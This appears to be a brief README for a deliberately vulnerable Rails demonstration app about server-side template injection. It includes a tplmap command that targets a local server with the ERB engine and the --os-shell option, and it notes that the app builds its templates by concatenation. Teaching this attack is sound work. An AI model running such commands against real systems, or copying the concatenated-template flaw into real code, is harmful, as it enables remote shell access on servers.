This application is a demonstration prototype just to show how to perform SSTI (Server side templating injection) attack.
rails serverRun SSTI attack with tplmap:
./tplmap.py --data 'name=value1' --engine erb --os-shell -u 'http://localhost:3000'In this example, the template is built by concatenation 😱